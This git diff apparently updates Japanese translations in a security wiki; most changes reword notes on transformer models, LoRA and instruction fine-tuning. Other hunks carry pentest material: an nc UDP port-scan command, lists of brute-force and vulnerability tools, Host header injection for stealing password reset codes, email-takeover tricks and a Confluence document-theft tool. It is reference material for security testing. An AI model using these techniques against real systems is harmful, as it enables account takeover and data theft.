 - **ドロップアウト（`drop_shortcut`）:** 正則化のためにドロップアウトを適用する。
 - **残差を加える（`x + shortcut`）:** 元の入力と組み合わせる。
 2. **2番目の残差パス（フィードフォワード）:**
 - **入力（`shortcut`）:** 次の残差接続のために更新された入力を保存する。
-- **レイヤーノルム（`norm2`）:** 入力を正規化する。
+- **レイヤーノーム（`norm2`）:** 入力を正規化する。
 - **フィードフォワードネットワーク（`ff`）:** フィードフォワード変換を適用する。
 - **ドロップアウト（`drop_shortcut`）:** ドロップアウトを適用する。
 - **残差を加える（`x + shortcut`）:** 最初の残差パスからの入力と組み合わせる。
 
 > [!NOTE]
-> トランスフォーマーブロックはすべてのネットワークをグループ化し、トレーニングの安定性と結果を改善するためにいくつかの**正規化**と**ドロップアウト**を適用する。\
+> トランスフォーマーブロックはすべてのネットワークをグループ化し、トレーニングの安定性と結果を改善するためにいくつかの**正規化**と**ドロップアウト**を適用します。\
 > 各ネットワークの使用後にドロップアウトが行われ、正規化が前に適用されることに注意してください。
 >
-> さらに、**ネットワークの出力をその入力に加える**ショートカットも使用されている。これにより、初期レイヤーが最後のレイヤーと「同じくらい」寄与することを確実にすることで、消失勾配問題を防ぐのに役立つ。
+> さらに、ショートカットを使用しており、これは**ネットワークの出力をその入力に加える**ことから成ります。これにより、初期層が最後の層と「同じくらい」寄与することを確実にすることで、消失勾配問題を防ぐのに役立ちます。
 
 ### **GPTModel**
 
@@ -554,7 +554,7 @@ ff_params = ff_first_layer_params + ff_second_layer_params
 ff_params = 2,362,368 + 2,360,064 = 4,722,432
 ```
 
-**c. レイヤー正規化**
+**c. レイヤーノーマライゼーション**
 
 - **コンポーネント:**
 - 各ブロックに2つの`LayerNorm`インスタンス。
@@ -590,7 +590,7 @@ pythonCopy codefinal_layer_norm_params = 2 * 768 = 1,536
 ```python
 pythonCopy codeoutput_projection_params = 768 * 50257 = 38,597,376
 ```
-#### **4. すべてのパラメータの要約**
+#### **4. すべてのパラメータの合計**
 ```python
 pythonCopy codetotal_params = (
 embedding_params +
@@ -608,9 +608,9 @@ total_params = 163,009,536
 ```
 ## テキスト生成
 
-前のトークンのように次のトークンを予測するモデルがあれば、出力から最後のトークンの値を取得するだけで済みます（それが予測されたトークンの値になります）。これは**語彙内の各エントリに対する値**となり、次に`softmax`関数を使用して次元を確率に正規化し、合計が1になるようにし、最大のエントリのインデックスを取得します。これが語彙内の単語のインデックスになります。
+次のトークンを予測するモデルがあれば、出力から最後のトークンの値を取得するだけで済みます（それが予測されたトークンのものになるため）、これは**語彙内の各エントリに対する値**となり、次に`softmax`関数を使用して次元を確率に正規化し、合計が1になるようにし、最大のエントリのインデックスを取得します。これが語彙内の単語のインデックスになります。
 
-コードは[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb)から。
+コードは [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb) からです。
 ```python
 def generate_text_simple(model, idx, max_new_tokens, context_size):
 # idx is (batch, n_tokens) array of indices in the current context
diff --git a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
index 4921d2658..41ee109b7 100644
--- a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
+++ b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
@@ -5,18 +5,18 @@
 > [!TIP]
 > **LoRAを使用することで、** すでに訓練されたモデルを**ファインチューニング**するために必要な計算が大幅に削減されます。
 
-LoRAは、モデルの**小さな部分**のみを変更することで、**大規模モデル**を効率的にファインチューニングすることを可能にします。これにより、訓練する必要のあるパラメータの数が減り、**メモリ**と**計算リソース**が節約されます。これは以下の理由によります：
+LoRAは、モデルの**小さな部分**のみを変更することで、**大規模モデル**を効率的にファインチューニングすることを可能にします。これにより、トレーニングする必要のあるパラメータの数が減り、**メモリ**と**計算リソース**が節約されます。これは以下の理由によります：
 
-1. **訓練可能なパラメータの数を削減**: モデル内の全体の重み行列を更新する代わりに、LoRAは重み行列を2つの小さな行列（**A**と**B**と呼ばれる）に**分割**します。これにより、訓練が**速く**なり、更新する必要のあるパラメータが少ないため、**メモリ**も**少なく**て済みます。
+1. **トレーニング可能なパラメータの数を削減**: モデル内の全体の重み行列を更新する代わりに、LoRAは重み行列を2つの小さな行列（**A**と**B**と呼ばれる）に**分割**します。これにより、トレーニングが**速く**なり、更新する必要のあるパラメータが少ないため、**メモリ**も**少なく**て済みます。
 
-1. これは、レイヤー（行列）の完全な重み更新を計算する代わりに、2つの小さな行列の積に近似するため、計算する更新が減少します：\
+1. これは、レイヤー（行列）の完全な重み更新を計算する代わりに、2つの小さな行列の積に近似するため、更新計算が削減されるからです：\
 <figure><img src="../../images/image (9) (1).png" alt=""><figcaption></figcaption></figure>
 
 2. **元のモデルの重みを変更しない**: LoRAを使用すると、元のモデルの重みをそのままにしておき、**新しい小さな行列**（AとB）だけを更新できます。これは、モデルの元の知識が保持され、必要な部分だけを調整することを意味するため、便利です。
-3. **効率的なタスク特化型ファインチューニング**: モデルを**新しいタスク**に適応させたい場合、モデルの残りの部分をそのままにしておき、**小さなLoRA行列**（AとB）だけを訓練すればよいです。これは、モデル全体を再訓練するよりも**はるかに効率的**です。
-4. **ストレージ効率**: ファインチューニング後、各タスクのために**新しいモデル全体**を保存する代わりに、**LoRA行列**だけを保存すればよく、これはモデル全体に比べて非常に小さいです。これにより、あまりストレージを使用せずにモデルを多くのタスクに適応させることが容易になります。
+3. **効率的なタスク特化型ファインチューニング**: モデルを**新しいタスク**に適応させたい場合、モデルの残りの部分をそのままにしておき、**小さなLoRA行列**（AとB）だけをトレーニングすればよいです。これは、モデル全体を再トレーニングするよりも**はるかに効率的**です。
+4. **ストレージ効率**: ファインチューニング後、各タスクのために**全く新しいモデル**を保存する代わりに、**LoRA行列**だけを保存すればよく、これは全体のモデルに比べて非常に小さいです。これにより、あまりストレージを使用せずにモデルを多くのタスクに適応させることが容易になります。
 
-ファインチューニング中にLinearの代わりにLoraLayersを実装するために、ここで提案されているコードは[https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb)です：
+ファインチューニング中にLinearの代わりにLoraLayersを実装するために、ここで提案されているコードがあります [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
 ```python
 import math
 
diff --git a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
index b253750a3..cfa8d9d2c 100644
--- a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
+++ b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
@@ -5,7 +5,7 @@
 
 ## データセット
 
-指示に従うようにLLMをファインチューニングするためには、指示と応答を含むデータセットが必要です。指示に従うようにLLMをトレーニングするためのさまざまなフォーマットがあります。例えば：
+指示に従うようにLLMをファインチューニングするには、指示と応答を含むデータセットが必要です。指示に従うようにLLMをトレーニングするためのさまざまな形式があります。例えば：
 
 - Apply Alpacaプロンプトスタイルの例：
 ```csharp
@@ -29,7 +29,7 @@ Absolutely! Gravity is a force that pulls objects toward each other.
 ```
 トレーニングデータセットを生のテキストではなく、このようなデータセットでLLMをトレーニングすることで、LLMは受け取る質問に対して具体的な回答を提供する必要があることを理解するのに役立ちます。
 
-したがって、リクエストと回答を含むデータセットで最初に行うべきことの1つは、そのデータを希望するプロンプト形式にモデル化することです。
+したがって、リクエストと回答を含むデータセットで最初に行うべきことの1つは、そのデータを希望するプロンプト形式でモデル化することです。
 ```python
 # Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
 def format_input(entry):
@@ -49,43 +49,43 @@ desired_response = f"\n\n### Response:\n{data[50]['output']}"
 
 print(model_input + desired_response)
 ```
-データセットをトレーニング、バリデーション、テスト用のセットに分ける必要があります。
+そのため、常にデータセットをトレーニング、検証、テスト用のセットに分ける必要があります。
 
 ## バッチ処理とデータローダー
 
-次に、トレーニングのためにすべての入力と期待される出力をバッチ処理する必要があります。これには以下が必要です：
+次に、トレーニング用のすべての入力と期待される出力をバッチ処理する必要があります。これには以下が必要です：
 
 - テキストをトークン化する
-- すべてのサンプルを同じ長さにパディングする（通常、長さはLLMの事前トレーニングに使用されたコンテキストの長さと同じくらいになります）
+- すべてのサンプルを同じ長さにパディングする（通常、長さはLLMの事前トレーニングに使用されたコンテキストの長さと同じくらい大きくなります）
 - カスタムコレート関数で入力を1つシフトして期待されるトークンを作成する
-- トレーニングロスから除外するために、いくつかのパディングトークンを-100に置き換える：最初の`endoftext`トークンの後、他のすべての`endoftext`トークンを-100に置き換えます（`cross_entropy(...,ignore_index=-100)`を使用することで、-100のターゲットを無視します）
+- トレーニング損失から除外するために、いくつかのパディングトークンを-100に置き換える：最初の`endoftext`トークンの後、他のすべての`endoftext`トークンを-100に置き換えます（`cross_entropy(...,ignore_index=-100)`を使用することで、-100のターゲットを無視します）
 - \[オプション\] LLMが回答を生成する方法のみを学習するように、質問に属するすべてのトークンも-100でマスクします。Apply Alpacaスタイルでは、`### Response:`までのすべてをマスクすることを意味します。
 
-これが作成されたら、各データセット（トレーニング、バリデーション、テスト）のデータローダーを作成する時間です。
+これが作成されたら、各データセット（トレーニング、検証、テスト）のデータローダーを作成する時です。
 
-## 事前トレーニングされたLLMのロードとファインチューニングおよびロスチェック
+## 事前トレーニングされたLLMのロードとファインチューニングおよび損失チェック
 
-ファインチューニングするために事前トレーニングされたLLMをロードする必要があります。これは他のページで既に議論されています。その後、以前に使用したトレーニング関数を使用してLLMをファインチューニングできます。
+ファインチューニングするために、事前トレーニングされたLLMをロードする必要があります。これは他のページで既に議論されています。その後、以前に使用したトレーニング関数を使用してLLMをファインチューニングできます。
 
-トレーニング中は、エポックごとにトレーニングロスとバリデーションロスがどのように変化するかを確認して、ロスが減少しているか、オーバーフィッティングが発生しているかを確認できます。\
-オーバーフィッティングは、トレーニングロスが減少しているが、バリデーションロスが減少していないか、むしろ増加している場合に発生します。これを避けるために、最も簡単な方法は、この挙動が始まるエポックでトレーニングを停止することです。
+トレーニング中は、エポック中にトレーニング損失と検証損失がどのように変化するかを確認して、損失が減少しているか、過学習が発生しているかを確認することも可能です。\
+過学習は、トレーニング損失が減少しているが、検証損失が減少していないか、さらには増加している場合に発生します。これを避けるために、最も簡単な方法は、この挙動が始まるエポックでトレーニングを停止することです。
 
 ## 応答の質
 
-これは分類ファインチューニングではないため、ロスの変動をより信頼できるわけではありませんが、テストセットの応答の質を確認することも重要です。したがって、すべてのテストセットから生成された応答を集めて、**その質を手動で確認する**ことをお勧めします。間違った回答があるかどうかを確認します（LLMが応答文の形式と構文を正しく作成することは可能ですが、完全に間違った応答を返すことがあります。ロスの変動はこの挙動を反映しません）。\
+これは分類ファインチューニングではないため、損失の変動をより信頼できるわけではありませんが、テストセットの応答の質を確認することも重要です。したがって、生成された応答をすべてのテストセットから集めて、**その質を手動で確認する**ことをお勧めします。間違った回答があるかどうかを確認します（LLMが応答文の形式と構文を正しく作成することは可能ですが、完全に間違った応答を返すことがあります。損失の変動はこの挙動を反映しません）。\
 生成された応答と期待される応答を**他のLLMに渡して応答を評価させる**ことでも、このレビューを行うことが可能です。
 
-応答の質を検証するために実行する他のテスト：
+応答の質を確認するために実行する他のテスト：
 
-1. **大規模マルチタスク言語理解 (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLUは、57の科目（人文学、科学など）にわたるモデルの知識と問題解決能力を評価します。さまざまな難易度レベル（初級から上級専門職まで）の理解を評価するために選択肢形式の質問を使用します。
-2. [**LMSYSチャットボットアリーナ**](https://arena.lmsys.org): このプラットフォームでは、異なるチャットボットの応答を並べて比較できます。ユーザーがプロンプトを入力すると、複数のチャットボットが応答を生成し、直接比較できます。
-3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEvalは、自動評価フレームワークで、GPT-4のような高度なLLMがさまざまなプロンプトに対する他のモデルの応答を評価します。
+1. **大規模マルチタスク言語理解 (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLUは、ヒューマニティーズ、サイエンスなど57の科目にわたるモデルの知識と問題解決能力を評価します。さまざまな難易度の選択肢問題を使用して理解を評価します。
+2. [**LMSYS Chatbot Arena**](https://arena.lmsys.org): このプラットフォームでは、異なるチャットボットの応答を並べて比較できます。ユーザーがプロンプトを入力すると、複数のチャットボットが応答を生成し、直接比較できます。
+3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEvalは、自動評価フレームワークで、GPT-4のような高度なLLMが他のモデルの応答をさまざまなプロンプトに対して評価します。
 4. **一般的な言語理解評価 (**[**GLUE**](https://gluebenchmark.com/)**):** GLUEは、感情分析、テキストの含意、質問応答など、9つの自然言語理解タスクのコレクションです。
 5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** GLUEを基にして、SuperGLUEは現在のモデルにとって難しいとされるより挑戦的なタスクを含んでいます。
 6. **模倣ゲームベンチマークを超えて (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-benchは、推論、翻訳、質問応答などの分野でモデルの能力をテストする200以上のタスクを持つ大規模なベンチマークです。
 7. **言語モデルの包括的評価 (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELMは、精度、堅牢性、公平性など、さまざまな指標にわたる包括的な評価を提供します。
 8. [**OpenAI Evals**](https://github.com/openai/evals)**:** OpenAIによるオープンソースの評価フレームワークで、カスタムおよび標準化されたタスクでAIモデルをテストできます。
-9. [**HumanEval**](https://github.com/openai/human-eval)**:** 言語モデルのコード生成能力を評価するために使用されるプログラミング問題のコレクションです。
+9. [**HumanEval**](https://github.com/openai/human-eval)**:** プログラミング問題のコレクションで、言語モデルのコード生成能力を評価するために使用されます。
 10. **スタンフォード質問応答データセット (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuADは、Wikipediaの記事に関する質問で構成されており、モデルは正確に回答するためにテキストを理解する必要があります。
 11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** トリビアの質問と回答の大規模データセットで、証拠文書も含まれています。
 
diff --git a/src/todo/llm-training-data-preparation/README.md b/src/todo/llm-training-data-preparation/README.md
index ced1fe61b..37151bd54 100644
--- a/src/todo/llm-training-data-preparation/README.md
+++ b/src/todo/llm-training-data-preparation/README.md
@@ -1,6 +1,6 @@
 # LLMトレーニング - データ準備
 
-**これは非常に推奨される本** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **からの私のノートで、いくつかの追加情報が含まれています。**
+**これは非常に推奨される本** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **からの私のメモで、いくつかの追加情報が含まれています。**
 
 ## 基本情報
 
@@ -34,7 +34,7 @@
 > この第三段階の目標は非常にシンプルです：**語彙内の各トークンに対して、モデルをトレーニングするために必要な次元のベクトルを割り当てること**。語彙内の各単語はX次元の空間内の点になります。\
 > 最初は、空間内の各単語の位置は「ランダムに」初期化され、これらの位置はトレーニング中に改善されるトレーニング可能なパラメータです。
 >
-> さらに、トークン埋め込み中に**別の埋め込み層が作成され**、これは（この場合）**トレーニング文内の単語の絶対位置を表します**。このように、文内の異なる位置にある単語は異なる表現（意味）を持ちます。
+> さらに、トークン埋め込みの間に**別の埋め込み層が作成され**、これは（この場合）**トレーニング文における単語の絶対位置を表します**。このように、文中の異なる位置にある単語は異なる表現（意味）を持ちます。
 
 {{#ref}}
 3.-token-embeddings.md
@@ -43,7 +43,7 @@
 ## 4. アテンションメカニズム
 
 > [!TIP]
-> この第四段階の目標は非常にシンプルです：**いくつかのアテンションメカニズムを適用すること**。これらは、**語彙内の単語と現在トレーニングに使用されている文内の隣接単語との関係を捉えるための多くの**繰り返し層**になります。\
+> この第四段階の目標は非常にシンプルです：**いくつかのアテンションメカニズムを適用すること**。これらは、**語彙内の単語と現在トレーニングに使用されている文中の隣接単語との関係を捉えるための多くの**繰り返し層**になります。\
 > これには多くの層が使用されるため、多くのトレーニング可能なパラメータがこの情報を捉えることになります。
 
 {{#ref}}
@@ -53,7 +53,7 @@
 ## 5. LLMアーキテクチャ
 
 > [!TIP]
-> この第五段階の目標は非常にシンプルです：**完全なLLMのアーキテクチャを開発すること**。すべてをまとめ、すべての層を適用し、テキストを生成したり、テキストをIDに変換したり逆にするためのすべての関数を作成します。
+> この第五段階の目標は非常にシンプルです：**完全なLLMのアーキテクチャを開発すること**。すべてをまとめ、すべての層を適用し、テキストを生成したり、テキストをIDに変換したり逆に変換するためのすべての関数を作成します。
 >
 > このアーキテクチャは、トレーニング後のテキストのトレーニングと予測の両方に使用されます。
 
@@ -64,7 +64,7 @@
 ## 6. プレトレーニングとモデルの読み込み
 
 > [!TIP]
-> この第六段階の目標は非常にシンプルです：**モデルをゼロからトレーニングすること**。これには、定義された損失関数とオプティマイザを使用して、モデルのすべてのパラメータをトレーニングするためにデータセットをループする前のLLMアーキテクチャが使用されます。
+> この第六段階の目標は非常にシンプルです：**モデルをゼロからトレーニングすること**。これには、定義された損失関数とオプティマイザを使用して、モデルのすべてのパラメータをトレーニングするために、前のLLMアーキテクチャが使用されます。
 
 {{#ref}}
 6.-pre-training-and-loading-models.md
@@ -91,7 +91,7 @@
 ## 7.2. 指示に従うためのファインチューニング
 
 > [!TIP]
-> このセクションの目標は、**テキストを生成するだけでなく、指示に従うためにすでにプレトレーニングされたモデルをファインチューニングする方法を示すこと**です。例えば、チャットボットとしてタスクに応答することです。
+> このセクションの目標は、**テキストを生成するのではなく、指示に従うためにすでにプレトレーニングされたモデルをファインチューニングする方法を示すこと**です。例えば、チャットボットとしてタスクに応答することです。
 
 {{#ref}}
 7.2.-fine-tuning-to-follow-instructions.md
diff --git a/src/todo/misc.md b/src/todo/misc.md
index 5d4fd077a..8a8a7f58b 100644
--- a/src/todo/misc.md
+++ b/src/todo/misc.md
@@ -15,9 +15,11 @@ $6$- sha512
 **UDPスキャン**\
 nc -nv -u -z -w 1 \<IP> 160-16
 
-特定のポートに空のUDPパケットが送信されます。UDPポートが開いている場合、ターゲットマシンからは返信が送信されません。UDPポートが閉じている場合、ターゲットマシンからICMPポート到達不能パケットが送信されるべきです。\
-UDPポートスキャンはしばしば信頼性が低く、ファイアウォールやルーターがICMPパケットをドロップする可能性があります。これにより、スキャンでの偽陽性が発生し、スキャンされたマシンのすべてのUDPポートが開いていると表示されることがよくあります。\
-ほとんどのポートスキャナーは、すべての利用可能なポートをスキャンせず、通常はスキャンされる「興味深いポート」のプリセットリストを持っています。
+特定のポートに空のUDPパケットが送信されます。UDPポートが開いている場合、ターゲットマシンからの応答は返されません。UDPポートが閉じている場合、ターゲットマシンからICMPポート到達不能パケットが返されるべきです。\
+
+UDPポートスキャンはしばしば信頼性が低く、ファイアウォールやルーターがICMP\
+パケットをドロップする可能性があります。これによりスキャンでの偽陽性が発生し、スキャンされたマシンのすべてのUDPポートが開いていると表示されることがよくあります。\
+ほとんどのポートスキャナーはすべての利用可能なポートをスキャンせず、通常はスキャンされる「興味深いポート」のプリセットリストを持っています。
 
 # CTF - トリック
 
diff --git a/src/todo/more-tools.md b/src/todo/more-tools.md
index 623ebfc32..55097a212 100644
--- a/src/todo/more-tools.md
+++ b/src/todo/more-tools.md
@@ -37,7 +37,7 @@
 - [https://github.com/hahwul/XSpear](https://github.com/hahwul/XSpear)
 - [https://github.com/BitTheByte/Monitorizer/](https://github.com/BitTheByte/Monitorizer/)
 - [https://github.com/spinkham/skipfish](https://github.com/spinkham/skipfish)
-- [https://github.com/blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) : 非同期でドメイン名をブルートフォース
+- [https://github.com/blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) : ドメイン名を非同期でブルートフォース
 - [https://crt.sh/?q=%.yahoo.com](https://crt.sh/?q=%.yahoo.com) : サブドメインブルートフォース
 - [https://github.com/tomnomnom/httprobe](https://github.com/tomnomnom/httprobe): ドメイン内のウェブサーバーがアクセス可能か確認する
 - [https://github.com/aboul3la/Sublist3r](https://github.com/aboul3la/Sublist3r) : サブドメイン発見
@@ -53,7 +53,7 @@
 - [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : Burpプラグイン、ドメイン、サブドメイン、IPを発見するためのオフライン分析
 - [https://github.com/hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons): 様々なツールのリスト
 - [https://github.com/gauravnarwani97/Trishul](https://github.com/gauravnarwani97/Trishul) : 脆弱性を見つけるためのBurpSuiteプラグイン（SQLi、XSS、SSTI）
-- [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) : ポストメッセージ関数を追跡するためのChrome拡張
+- [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) : ポストメッセージ関数を追跡するためのChrome拡張機能
 - [https://github.com/Quitten/Autorize](https://github.com/Quitten/Autorize) : 自動認証テスト（クッキーを削除し、リクエストを送信しようとする）
 - [https://github.com/pikpikcu/xrcross](https://github.com/pikpikcu/xrcross): XRCrossは再構築、スキャナー、ペネトレーション/バグバウンティテスト用のツールです。このツールは（XSS|SSRF|CORS|SSTI|IDOR|RCE|LFI|SQLI）脆弱性をテストするために構築されました。
 
@@ -86,7 +86,7 @@
 - [https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html](https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html)
 - [https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html](https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html)
 
-ファームウェアをオンラインで見つけられない場合の抽出方法：[https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
+オンラインで見つからない場合のファームウェアの抽出方法：[https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
 
 分析するための脆弱性のあるファームウェア：[https://github.com/scriptingxss/IoTGoat](https://github.com/scriptingxss/IoTGoat)
 
@@ -102,7 +102,7 @@
 - [https://github.com/skelsec/jackdaw](https://github.com/skelsec/jackdaw)
 - [https://github.com/CoatiSoftware/Sourcetrail](https://github.com/CoatiSoftware/Sourcetrail) : 静的コード分析
 - [https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html](https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html) : Bluetooth LE CTF
-- [https://github.com/skeeto/endlessh](https://github.com/skeeto/endlessh) : SSHターピットがゆっくりと無限のバナーを送信します。
+- [https://github.com/skeeto/endlessh](https://github.com/skeeto/endlessh) : SSHターピットが無限のバナーをゆっくり送信します。
 - AWSおよびクラウドツール：[https://github.com/toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools)
 - フィッシング用のIFS（Interplanetary File System）：[https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/)
 - IPローテーションサービス：[https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212](https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212)
diff --git a/src/todo/online-platforms-with-api.md b/src/todo/online-platforms-with-api.md
index c9e258a0b..5370537cb 100644
--- a/src/todo/online-platforms-with-api.md
+++ b/src/todo/online-platforms-with-api.md
@@ -46,7 +46,7 @@ IPやドメインに関連する悪意のある活動を見つけます。無料
 
 ## [mywot](https://www.mywot.com/)
 
-意見や他の指標に基づいて、ドメインが疑わしい/悪意のある情報に関連しているかどうかを取得します。
+意見や他の指標に基づいて、ドメインが疑わしい/悪意のある情報に関連しているかどうかを確認します。
 
 ## [ipinfo](https://ipinfo.io/)
 
diff --git a/src/todo/other-web-tricks.md b/src/todo/other-web-tricks.md
index 8b950bc30..3cab6e19f 100644
--- a/src/todo/other-web-tricks.md
+++ b/src/todo/other-web-tricks.md
@@ -1,34 +1,34 @@
-# Other Web Tricks
+# その他のウェブトリック
 
 {{#include ../banners/hacktricks-training.md}}
 
-### Host header
+### Hostヘッダー
 
-バックエンドは、いくつかのアクションを実行するために**Host header**を信頼することがあります。たとえば、その値を**パスワードリセットを送信するドメイン**として使用することがあります。したがって、パスワードをリセットするためのリンクが含まれたメールを受け取ったとき、使用されるドメインはHost headerに入力したものです。その後、他のユーザーのパスワードリセットを要求し、ドメインをあなたが制御するものに変更して、彼らのパスワードリセットコードを盗むことができます。[WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
+バックエンドが**Hostヘッダー**を信頼していくつかのアクションを実行することが何度かあります。例えば、その値を**パスワードリセットを送信するドメイン**として使用することがあります。したがって、パスワードリセットのリンクが含まれたメールを受け取ると、使用されるドメインはHostヘッダーに入力したものになります。その後、他のユーザーのパスワードリセットをリクエストし、ドメインをあなたが制御するものに変更して、彼らのパスワードリセットコードを盗むことができます。[WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2)。
 
 > [!WARNING]
 > ユーザーがリセットパスワードリンクをクリックするのを待つ必要がない可能性があることに注意してください。おそらく**スパムフィルターや他の中間デバイス/ボットがそれをクリックして分析するでしょう**。
 
-### Session booleans
+### セッションブール値
 
-時々、いくつかの検証を正しく完了すると、バックエンドは**セキュリティ属性に「True」という値のブール値を追加するだけです**。その後、別のエンドポイントは、そのチェックに成功したかどうかを知ることができます。\
-しかし、もしあなたが**チェックに合格し**、セッションがそのセキュリティ属性に「True」値を付与された場合、**同じ属性に依存する他のリソースにアクセスしようとすることができますが、アクセスする権限はないはずです**。[WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
+時々、いくつかの検証を正しく完了すると、バックエンドは**セッションのセキュリティ属性に「True」という値のブール値を追加するだけです**。その後、別のエンドポイントは、そのチェックに成功したかどうかを知ることができます。\
+しかし、もし**チェックに合格**し、セッションがそのセキュリティ属性に「True」値を付与された場合、**同じ属性に依存する他のリソースにアクセスしようとすることができますが、アクセスする権限はないはずです**。[WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a)。
 
-### Register functionality
+### 登録機能
 
 既存のユーザーとして登録を試みてください。また、同等の文字（ドット、たくさんのスペース、Unicode）を使用してみてください。
 
-### Takeover emails
+### メールの乗っ取り
 
-メールを登録し、確認する前にメールを変更します。次に、新しい確認メールが最初に登録されたメールに送信される場合、任意のメールを乗っ取ることができます。また、最初のメールを確認するために2番目のメールを有効にできる場合も、任意のアカウントを乗っ取ることができます。
+メールを登録し、確認する前にメールを変更します。次に、新しい確認メールが最初に登録したメールに送信される場合、任意のメールを乗っ取ることができます。また、2番目のメールが最初のメールを確認することを有効にできる場合も、任意のアカウントを乗っ取ることができます。
 
-### Access Internal servicedesk of companies using atlassian
+### Atlassianを使用した企業の内部サービスデスクへのアクセス
 
 {% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
 
-### TRACE method
+### TRACEメソッド
 
-開発者は、プロダクション環境でさまざまなデバッグオプションを無効にするのを忘れることがあります。たとえば、HTTP `TRACE`メソッドは診断目的で設計されています。これが有効になっている場合、Webサーバーは`TRACE`メソッドを使用したリクエストに対して、受信した正確なリクエストを応答にエコーして応答します。この動作は通常無害ですが、時折、リバースプロキシによってリクエストに追加される内部認証ヘッダーの名前など、情報漏洩につながることがあります。![Image for post](https://miro.medium.com/max/60/1*wDFRADTOd9Tj63xucenvAA.png?q=20)
+開発者は、プロダクション環境でさまざまなデバッグオプションを無効にするのを忘れることがあります。例えば、HTTP `TRACE`メソッドは診断目的で設計されています。これが有効になっている場合、ウェブサーバーは`TRACE`メソッドを使用したリクエストに対して、受信した正確なリクエストを応答にエコーして返します。この動作は通常無害ですが、時折、リバースプロキシによってリクエストに追加される内部認証ヘッダーの名前など、情報漏洩につながることがあります。![Image for post](https://miro.medium.com/max/60/1*wDFRADTOd9Tj63xucenvAA.png?q=20)
 
 ![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png)
 
diff --git a/src/todo/post-exploitation.md b/src/todo/post-exploitation.md
index 8e980752a..093fef809 100644
--- a/src/todo/post-exploitation.md
+++ b/src/todo/post-exploitation.md
@@ -7,7 +7,7 @@
 
 ## **外部サービス**
 
-- [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): このモジュールは、アクセストークンを使用してConfluenceのAPIに接続し、PDFにエクスポートし、ターゲットがアクセスできるConfluence文書をダウンロードします。
+- [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): このモジュールは、アクセストークンを使用してConfluenceのAPIに接続し、PDFにエクスポートし、ターゲットがアクセスできるConfluenceドキュメントをダウンロードします。
